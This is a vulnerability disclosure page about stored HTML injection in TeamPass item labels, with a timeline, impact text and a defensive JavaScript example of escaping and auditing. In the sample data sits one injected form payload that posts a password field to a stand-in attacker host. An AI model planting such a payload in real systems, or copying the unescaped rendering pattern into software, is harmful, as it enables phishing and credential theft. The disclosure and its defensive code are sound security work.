Stored HTML Injection in Item Label in nilsteampassnet/teampass

Valid

Reported on

May 7th 2023


Description

If two users have access to the same folder, a malicious user can create an item whose label field is vulnerable to HTML injection. When other users view that item, they may be redirected to the attacker's website, or their data may be captured through a form.

Proof of Concept

https://drive.google.com/file/d/1UkeRtAAIhwYTxvVCSrIozCUDukhrlVBT/view

Impact

Malicious users could potentially exploit the vulnerability in the label field of an item to carry out an HTML injection attack, which could redirect other users to an attacker's website or capture their sensitive data through a form. This could result in a variety of negative consequences, including the theft of confidential information, financial loss, and reputational damage to the affected users or organizations. Additionally, the attack could spread further, affecting other users who interact with the compromised item or website, leading to a wider breach of security.
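The rendering pattern behind this class of bug, shown as an added example that is not TeamPass code and not part of the original report. It assumes the stored label is concatenated into markup when the item list is built, shows the same rendering with output encoding, and adds an audit helper for labels already in storage. All function names and sample items are constructed.

```javascript
// Added example, not TeamPass code; names and sample labels are constructed.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five HTML-significant characters so a label is always rendered as text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable pattern (assumed): the stored label is concatenated into markup unchanged.
function renderItemUnsafe(item) {
  return '<li class="item">' + item.label + '</li>';
}

// Hardened pattern: the label is encoded at output time, whatever was stored.
function renderItemSafe(item) {
  return '<li class="item">' + escapeHtml(item.label) + '</li>';
}

// Audit helper: return ids of items whose stored label contains tag-like markup.
// Output encoding stops rendering but does not clean labels saved before the fix.
function findSuspectLabels(items) {
  const tagLike = /<\s*\/?\s*[a-zA-Z][^>]*>/;
  return items.filter((item) => tagLike.test(String(item.label))).map((item) => item.id);
}

// Constructed sample data standing in for items in a folder shared by two users.
const sampleItems = [
  { id: 1, label: 'Prod DB root' },
  { id: 2, label: 'VPN <b>gateway</b>' },
  { id: 3, label: '<form action="https://attacker.example/"><input name="pw"></form>' },
  { id: 4, label: 'Backup key (size < 4096 & > 1024)' },
];

for (const item of sampleItems) console.log(renderItemSafe(item));
console.log('labels to review:', findSuspectLabels(sampleItems));
```

Item 4 is not flagged because its `<` and `>` do not form a tag, which keeps the audit from drowning reviewers in legitimate labels.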

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. (18 days ago)
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back. (17 days ago)
Nils Laumaillé validated this vulnerability 16 days ago
M Nadeem Qazi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nils Laumaillé marked this as fixed in 3.0.7 with commit 57a977 16 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Nils Laumaillé published this vulnerability 16 days ago
Nils Laumaillé gave praise 16 days ago
Thank you 👍
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
M Nadeem Qazi
16 days ago

Researcher


Thanks
